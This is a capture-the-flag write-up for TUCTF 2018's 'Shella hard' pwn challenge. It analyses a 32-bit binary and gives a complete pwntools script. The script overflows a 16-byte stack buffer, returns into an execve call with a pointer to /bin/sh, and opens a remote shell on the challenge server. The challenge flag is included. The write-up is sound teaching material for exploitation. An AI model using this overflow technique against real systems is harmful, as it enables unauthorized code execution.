Tags: pwn 

Rating: 5.0

# Shella hard
---

## Description

Difficulty: mind-melting hard
This program is crap! Is there even anything here?

nc 3.16.169.157 12345

---

## Approach

When running the program, there were no outputs.

```
root@kali:~/Desktop/tuctf/shella-hard# ./shella-hard
testtest

root@kali:~/Desktop/tuctf/shella-hard# checksec shella-hard
[*] '/root/Desktop/tuctf/shella-hard/shella-hard'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
root@kali:~/Desktop/tuctf/shella-hard#
```

NX is enabled and no PIE and also no canary is found. This means we will not be
using shellcode here.

## Disassembly

Disassembling this
```
0x0804843b <+0>: push ebp
0x0804843c <+1>: mov ebp,esp
0x0804843e <+3>: sub esp,0x10
0x08048441 <+6>: push 0x1e
0x08048443 <+8>: lea eax,[ebp-0x10]
0x08048446 <+11>: push eax
0x08048447 <+12>: push 0x0
0x08048449 <+14>: call 0x8048300 <read@plt>
0x0804844e <+19>: add esp,0xc
0x08048451 <+22>: mov eax,0x0
0x08048456 <+27>: leave
0x08048457 <+28>: ret
End of assembler dump.
```

It is a pleasantly short program which does not take much time to reverse back.

```c
// It only consist of one read function call
read(0,&buf0x1e);
```

Also, there is a function that wasnt shown here. It is giveShell function

```
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x080482cc _init
0x08048300 read@plt
0x08048310 __libc_start_main@plt
0x08048320 execve@plt
0x08048340 _start
0x08048370 __x86.get_pc_thunk.bx
0x08048380 deregister_tm_clones
0x080483b0 register_tm_clones
0x080483f0 __do_global_dtors_aux
0x08048410 frame_dummy
0x0804843b main
0x08048458 giveShell
0x08048480 __libc_csu_init
0x080484e0 __libc_csu_fini
0x080484e4 _fini
```

Disassembling giveShell,

```
gdb-peda$ disassemble giveShell
Dump of assembler code for function giveShell:
0x08048458 <+0>: push ebp
0x08048459 <+1>: mov ebp,esp
0x0804845b <+3>: nop
0x0804845c <+4>: mov eax,ds:0x6a006a44
0x08048461 <+9>: add BYTE PTR [eax+0x0],ch
0x08048464 <+12>: test DWORD PTR [eax+ecx*1],eax
0x08048467 <+15>: call 0x8048320 <execve@plt>
0x0804846c <+20>: add esp,0xc
0x0804846f <+23>: nop
0x08048470 <+24>: leave
0x08048471 <+25>: ret
End of assembler dump.
gdb-peda$
```

After looking at this and attempting to reverse this, There were some really wierd things
going on here. The EBP was saved and new EBP is initialized. There is also the execve function
called which got me excited but execve is just being called without any parameters. This means that
there is no program to execute let along /bin/sh.

---
## Approach

The idea for this is to return to execve function call straight while setting up the stack for /bin/sh.
We will want to modify the stack to look something like the following:

```
BEFORE LEAVE and RET Instruction

----------- <-- ESP , EBP-0x10
buffer
-----------
.
.
.
-----------
buffer
-----------
buffer
----------- <-- EBP
saved EBP
-----------
ret addr --> EXECVE
-----------
???? --------------> /bin/sh
-----------

```

Reason for this is that when the main program returns, the stackframe containing the buffer will be cleared
with ESP pointing to the return address. When the ret instruction is called, the `ret addr` will be popped off the
stack leaving the memory location to /bin/sh at the top of the stack. If the `ret addr` is to call execve, the whatever that is on the
stack will be its parameter which is /bin/sh, spawning a shell.

```
During RET

-----------
buffer
-----------
.
.
.
-----------
buffer
-----------
buffer
-----------
saved EBP
-----------
call execve < ---- pop to EIP decrementing ESP
-----------
&(/bin/sh) < ------ ESP
-----------

```
So now we want to find out the address of /bin/sh and the call execve instruction.

```
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
shella-hard : 0x8048500 ("/bin/sh")
shella-hard : 0x8049500 ("/bin/sh")
libc : 0xf7f4e968 ("/bin/sh")

gdb-peda$ disassemble giveShell
.
.
.
0x08048467 <+15>: call 0x8048320 <execve@plt>
.
.
.
```

With these, we will first overwrite 0x10 + 4 bytes to overflow the buffer then overwrite that
return address to `0x8048320` then add the memory location to /bin/sh.

```
payload += "A"*(20)+ p32(giveShellAddr)+p32(binsh)
```

---
## The Script

```python
from pwn import *

#p = process("./shella-hard")
p = remote("3.16.169.157",12345)
#raw_input()
print p.recvrepeat(0.9)

payload = ""

binsh = 0x08048500
giveShellAddr = 0x08048467
exitaddr = 0xf7e02c30

print "giveShell : " + hex(giveShellAddr)

payload += "A"*(20)+ p32(giveShellAddr)+p32(binsh)

f= open("pl","w")
f.write(payload)
f.close()
p.send(payload)
print p.recvrepeat(1)
p.interactive()
```

resulting in

![solved.png](https://cexplrhome.files.wordpress.com/2018/11/solved1.png)

Flag: TUCTF{175_wh475_1n51d3_7h47_c0un75}
---
---

Original writeup (https://cexplr.home.blog/2018/11/26/shella-hard-tuctf-2018/).